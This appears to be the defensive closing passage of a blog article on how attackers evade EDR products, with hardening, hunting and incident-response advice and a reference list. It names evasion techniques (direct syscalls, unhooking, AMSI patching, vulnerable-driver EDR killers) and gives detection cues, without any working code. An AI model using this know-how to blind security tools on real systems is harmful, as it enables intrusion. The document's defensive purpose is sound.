- EDR Self-Protection and Monitoring: Make sure your EDR’s tamper protection is turned on everywhere. Test it — try to stop the service or delete its files on a test machine (with permission!) to ensure it truly holds up. An EDR that can run as PPL and has a strong self-defense will force attackers to spend more time (which increases likelihood of detection) or use kernel exploits (which are rarer). Also, ensure your EDR is configured to monitor for indications of hooking bypass: some EDRs log when they detect direct syscalls or unhooking activity (e.g., if they find their hooks removed). If your EDR can alert on “integrity failures” of its hooks or unexpected syscalls, treat those alerts as high priority — even if the EDR doesn’t fully block the action, it’s a sign of an advanced attempt underway.
- Memory Scanning and Canary Threads: Encourage or enable memory scanning features in your EDR if available. Some EDRs can do scan-on-demand or have rules like “scan process memory if it makes a network connection and it wasn’t a known process” to catch fileless implants. Likewise, some defenders set up canary processes or threads — basically dummy processes that have no business being touched, and if something injects into them or tampers, it’s definitely malicious. While not common out-of-the-box, creative threat hunters could set traps like that.
- Monitor for Injection Artifacts: Even if attackers try to hide threads, there are artifacts. Use EDR and OS event logs to watch for things like process handle opens with suspicious access, calls to VirtualAllocEx/WriteProcessMemory, and so on. Sysmon (if you use it) with the right config can log remote thread creations. An injected thread might still have to call Win32 APIs eventually – anomalies like a thread in explorer.exe calling WinInet to talk to an IP that explorer normally wouldn’t, could be flagged. Emerging EDR techniques also look at call stack patterns; while that’s more in vendor territory, as a customer you can demand these capabilities or supplement with endpoint monitoring tools that do stack analysis on events.
- PowerShell & AMSI Logging: Enable PowerShell Constrained Language Mode for regular users if possible, or at least turn on PowerShell Script Block Logging and AMSI integration in your AV/EDR. AMSI can catch a lot of script-based malware unless it’s obfuscated to the gills. Yes, attackers can bypass AMSI by patching (which itself can be detected by some solutions when the AMSI DLL is modified in memory), but many opportunistic attacks won’t bother if they don’t have to. Logging script activity means even if something fileless happens, you have an audit trail to investigate after the fact.
- Network and Cloud Analytics: Sometimes, no matter how good your endpoint is, something may slip by initially. Complement EDR with network monitoring — if a host that’s normally quiet starts beaconing out to an IP in a foreign country on an unusual port, that’s a clue. Network analytics can catch C2 traffic even if the malware is memory-resident and EDR-blinded. Also, many EDRs have cloud-based sandboxing: if a file is unknown, it detonates it in a sandbox. Make sure that’s enabled — it might catch something that tries to be fileless by examining its behavior in a safe environment.
- Hunt for Abuse of Legit Tools: Proactively threat hunt for signs of LOLBin abuse and injection. For example, query your EDR data for instances of rundll32.exe executing with unusual arguments, or regsvr32.exe loading from temp folders. Look for processes with mismatched names (e.g., a process named svchost.exe running from an atypical directory – could be hollowed). Hunt for “multiple ntdll loaded in same process” – if your EDR or memory forensics tool can show that, it’s almost certainly malicious (legit processes shouldn’t have two ntdlls loaded).
- User Education and Phishing Defense: While not directly EDR-evasion, a huge chunk of these attacks start with phishing or user execution of something. By reducing successful initial footholds (through training, phishing prevention, hardening macros, etc.), you reduce the chances you even have to deal with EDR evasion. It’s trite but true: if they can’t get in, they can’t do all this fancy stuff.
- Incident Response Planning: Assume that someday an attacker might drop an “EDR killer” on one of your hosts. Plan for it. If an endpoint stops reporting or the EDR agent dies mysteriously, have playbooks to isolate that machine immediately and investigate out-of-band. Keep memory forensics tools handy — as shown by research, even stealthy malware often leaves traces in RAM that can be uncovered with specialist tools (Volatility plugins, etc.). Regular drills where EDR is “blinded” and you rely on other logs can help prepare for the real thing.
Ultimately, the battle between attackers and EDRs is very much alive and evolving. Attackers will keep finding ingenious ways to tiptoe around defenses — from carving their own path to the kernel with syscalls, to borrowing your glasses (LOLBins) so you don’t recognize them, or cutting the wires entirely with driver exploits. But knowledge is power. By understanding these evasion techniques, security teams can better tune their defenses to catch the sly behavior that belies an intruder. It’s a game of cat-and-mouse, yes — but it’s a game we can win by staying informed, adaptive, and layered in our approach.
Stay safe, stay vigilant, and may your endpoints be ghost-proof!
References:
- Hutchins, M. “An Introduction to Bypassing User Mode EDR Hooks.” MalwareTech Blog, Dec 2023.
- Case, A. “Defeating EDR-Evading Malware with Memory Forensics.” DEF CON 31 White Paper, Aug 2023.
- VMRay. “Just Carry a Ladder — Why Your EDR Let Pikabot Jump Through.” VMRay Blog, 2023.
- Paritosh. “How Attackers Bypass EDR and How to Defend Against Them.” Medium, Oct 2024.
- Von Tish, L. “EDR Bypass with LoLBins.” Bishop Fox Blog, Mar 2023.
- Cobalt Strike Developer Blog. “Cobalt Strike 4.11 — Beacon is Sleeping….” Aug 2022.
- Cybereason. “Sliver C2 Leveraged by Many Threat Actors.” Cybereason Lab Analysis, 2022.
- Check Point Research. “Breaking Boundaries: Vulnerable Drivers and Mitigating Risks.” Sep 2024.
- Halcyon. “Blocking BYOVD Techniques to Prevent AV/EDR Bypasses.” Jun 2024.
- Sophos News. “RansomHub rolls out brand-new, EDR-killing BYOVD binary ‘EDRKillShifter’.” (Referenced via SecurityAffairs), Aug 2024.
.png)

